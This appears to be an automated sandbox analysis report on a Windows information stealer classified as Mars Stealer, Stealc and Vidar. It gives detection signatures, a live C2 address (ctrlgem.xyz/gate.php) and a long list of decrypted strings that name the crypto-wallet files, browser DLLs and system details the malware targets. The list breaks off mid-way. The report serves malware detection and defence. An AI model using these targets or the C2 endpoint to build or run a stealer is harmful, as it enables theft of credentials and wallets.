Windows Analysis Report
m0wsoI3.exe

Overview

General Information

Sample name: m0wsoI3.exe
Analysis ID: 1640592
MD5: 599e5d1eea684ef40fc206f71b5d4643
SHA1: 5111931bba3c960d14b44871950c62249aeefff7
SHA256: 2321c97ec6ac02f588357ad3d72df237f3042054f603851587c59eaef5ceb13c
Tags: ArkeiStealerexeuser-abuse_ch
Infos:

Detection

Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Found evasive API chain (may stop execution after checking computer name)
Found evasive API chain (may stop execution after checking locale)
Found evasive API chain (may stop execution after checking mutex)
Found many strings related to Crypto-Wallets (likely being stolen)
Joe Sandbox ML detected suspicious sample
PE file has a writeable .text section
PE file has nameless sections
Performs DNS queries to domains with low reputation
Sample uses string decryption to hide its real strings
Self deletion via cmd or bat file
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: m0wsoI3.exe Avira: detected
Antivirus detection for URL or domain
Source: http://ctrlgem.xyz/gate.php Avira URL Cloud: Label: malware
Source: ctrlgem.xyz/gate.php Avira URL Cloud: Label: malware
Found malware configuration
Source: 0.2.m0wsoI3.exe.400000.0.unpack Malware Configuration Extractor: Mars Stealer {"C2 url": "ctrlgem.xyz/gate.php"}
Multi AV Scanner detection for submitted file
Source: m0wsoI3.exe Virustotal: Detection: 82% Perma Link
Source: m0wsoI3.exe ReversingLabs: Detection: 83%
Joe Sandbox ML detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Sample uses string decryption to hide its real strings
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: LoadLibraryA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: LoadLibraryA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetProcAddress
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetProcAddress
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ExitProcess
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ExitProcess
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: advapi32.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: advapi32.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: crypt32.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: crypt32.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetTickCount
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetTickCount
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Sleep
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Sleep
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateMutexA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateMutexA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetLastError
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetLastError
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: HeapAlloc
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: HeapAlloc
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetProcessHeap
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetProcessHeap
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetComputerNameA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetComputerNameA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: VirtualProtect
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: VirtualProtect
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetCurrentProcess
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetCurrentProcess
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetUserNameA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetUserNameA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: HAL9TH
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: HAL9TH
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: JohnDoe
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: JohnDoe
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: 21/04/2022 20:00:00
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: 21/04/2022 20:00:00
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: http://
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: http://
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Default
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Default
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: %hu/%hu/%hu %hu:%hu:%hu
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: %hu/%hu/%hu %hu:%hu:%hu
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: open
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: open
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: sqlite3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: sqlite3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: C:\ProgramData\sqlite3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: C:\ProgramData\sqlite3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: freebl3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: freebl3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: C:\ProgramData\freebl3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: C:\ProgramData\freebl3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: mozglue.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: mozglue.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: C:\ProgramData\mozglue.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: C:\ProgramData\mozglue.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: msvcp140.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: msvcp140.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: C:\ProgramData\msvcp140.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: C:\ProgramData\msvcp140.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: nss3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: nss3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: softokn3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: softokn3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: C:\ProgramData\softokn3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: C:\ProgramData\softokn3.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: vcruntime140.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: vcruntime140.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: C:\ProgramData\vcruntime140.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: C:\ProgramData\vcruntime140.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: .zip
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: .zip
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Tag:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Tag:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: IP: IP?
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: IP: IP?
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Country: Country?
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Country: Country?
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Working Path:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Working Path:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Local Time:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Local Time:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: TimeZone:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: TimeZone:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Display Language:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Display Language:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Keyboard Languages:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Keyboard Languages:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Is Laptop:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Is Laptop:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Processor:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Processor:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Installed RAM:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Installed RAM:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: OS:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: OS:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: (
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: (
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Bit)
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Bit)
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Videocard:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Videocard:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Display Resolution:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Display Resolution:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: PC name:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: PC name:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: User name:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: User name:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Domain name:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Domain name:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: MachineID:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: MachineID:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GUID:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GUID:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Installed Software:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Installed Software:
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: system.txt
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: system.txt
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Grabber\%s.zip
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Grabber\%s.zip
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: %APPDATA%
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: %APPDATA%
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: %LOCALAPPDATA%
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: %LOCALAPPDATA%
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: %USERPROFILE%
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: %USERPROFILE%
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: %DESKTOP%
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: %DESKTOP%
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Wallets\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Wallets\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Ethereum
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Ethereum
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \Ethereum\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \Ethereum\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: keystore
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: keystore
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Electrum
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Electrum
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \Electrum\wallets\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \Electrum\wallets\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: *.*
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: *.*
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ElectrumLTC
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ElectrumLTC
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \Electrum-LTC\wallets\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \Electrum-LTC\wallets\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Exodus
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Exodus
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \Exodus\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \Exodus\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: exodus.conf.json
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: exodus.conf.json
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: window-state.json
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: window-state.json
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \Exodus\exodus.wallet\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \Exodus\exodus.wallet\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: passphrase.json
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: passphrase.json
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: seed.seco
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: seed.seco
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: info.seco
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: info.seco
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ElectronCash
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ElectronCash
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \ElectronCash\wallets\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \ElectronCash\wallets\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: default_wallet
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: default_wallet
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: MultiDoge
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: MultiDoge
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \MultiDoge\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \MultiDoge\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: multidoge.wallet
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: multidoge.wallet
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: JAXX
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: JAXX
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \jaxx\Local Storage\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \jaxx\Local Storage\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: file__0.localstorage
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: file__0.localstorage
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Atomic
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Atomic
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \atomic\Local Storage\leveldb\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \atomic\Local Storage\leveldb\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: 000003.log
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: 000003.log
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CURRENT
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CURRENT
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: LOCK
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: LOCK
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: LOG
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: LOG
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: MANIFEST-000001
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: MANIFEST-000001
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: 0000*
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: 0000*
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Binance
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Binance
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \Binance\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \Binance\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: app-store.json
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: app-store.json
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Coinomi
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: Coinomi
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \Coinomi\Coinomi\wallets\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: \Coinomi\Coinomi\wallets\
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: *.wallet
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: *.wallet
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: *.config
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: *.config
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: *wallet*.dat
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: *wallet*.dat
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetSystemTime
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetSystemTime
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: lstrcatA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: lstrcatA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ntdll.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ntdll.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: sscanf
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: sscanf
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: memset
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: memset
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: memcpy
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: memcpy
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: wininet.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: wininet.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: user32.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: user32.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: gdi32.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: gdi32.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: netapi32.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: netapi32.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: psapi.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: psapi.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: bcrypt.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: bcrypt.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: vaultcli.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: vaultcli.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: shlwapi.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: shlwapi.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: shell32.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: shell32.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: gdiplus.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: gdiplus.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ole32.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ole32.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: dbghelp.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: dbghelp.dll
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateFileA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CreateFileA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: WriteFile
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: WriteFile
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CloseHandle
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CloseHandle
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetFileSize
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetFileSize
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: lstrlenA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: lstrlenA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: LocalAlloc
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: LocalAlloc
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GlobalFree
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GlobalFree
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ReadFile
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: ReadFile
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: OpenProcess
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: OpenProcess
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: SetFilePointer
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: SetFilePointer
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: SetEndOfFile
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: SetEndOfFile
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetCurrentProcessId
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetCurrentProcessId
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetLocalTime
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetLocalTime
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: LocalFree
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: LocalFree
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetSystemInfo
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetSystemInfo
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: IsWow64Process
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: IsWow64Process
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetTempPathA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetTempPathA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetLocaleInfoA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetLocaleInfoA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetFileSizeEx
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetFileSizeEx
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetFileAttributesA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetFileAttributesA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: FindFirstFileA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: FindFirstFileA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: FindNextFileA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: FindNextFileA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: FindClose
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: FindClose
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetCurrentDirectoryA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: GetCurrentDirectoryA
Source: 0.2.m0wsoI3.exe.400000.0.unpack String decryptor: CopyFileA
